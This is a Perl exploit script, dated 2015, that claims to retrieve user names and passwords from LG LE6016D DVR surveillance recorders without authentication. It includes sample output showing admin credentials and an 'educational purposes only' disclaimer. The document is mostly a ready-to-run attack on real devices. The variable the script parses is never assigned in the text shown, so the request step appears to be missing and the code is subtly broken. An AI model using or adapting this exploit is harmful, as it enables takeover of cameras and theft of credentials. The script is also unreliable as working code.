#!/usr/bin/perl
#
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
#
#
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
####
#
# Digital video recorder (DVR) surveillance is the use of cameras,
# often hidden or concealed, that use DVR technology to record
# video for playback or immediate viewing. As technological
# innovations have made improvements in the security and
# surveillance industry, DVR surveillance has become more
# prominent and allows for easier and more versatile security
# systems in homes and businesses. A DVR surveillance security
# system can be designed for indoor use or outdoor use and can
# often involve hidden security cameras, concealed “nanny cams”
# for home security, and even personal recording devices hidden
# on a person.
#
####
#
# Description:
# No authentication (login) is required to exploit this vulnerability.
# This program demonstrates how unpatched security bug would enable
# hackers to gain control of a vulnerable device while sitting
# behind their keyboard, potentially thousands of miles away.
# An unauthenticated attacker that is connected to the DVR's may be
# able to retrieve the device's administrator password allowing them
# to directly access the device's configuration control panel.
#
####
#
# Disclaimer:
# This or previous programs is for Educational purpose ONLY. Do not
# use it without permission.The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
####
# Use them at your own risk!
####
#
# $ perl lg.pl 133.7.133.7:80
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
# u/p: admin/000000
# u/p: user1/000000
# u/p: user2/000000
# u/p: user3/000000
# u/p: LOGOUT/000000
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
#
####
use
LWP::Simple;
print
" LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n"
;
if
(
@ARGV
== 0) {&usg; &foot;}
while
(
@ARGV
> 0) {
$t
=
shift
(
@ARGV
);
}
for
(
my
$i
=0;
$i
<= 4;
$i
++){
if
(
$r
=~ m/<name>(.*)<\/name>/g){
print
" u\/p: $1\/"
;
}
if
(
$r
=~ m/<pw>(.*)<\/pw>/g){
print
"$1\n"
;
}
}
&foot;
sub
usg(){
print
"\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n"
;
}
sub
foot(){
print
" Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n"
;
exit
;
}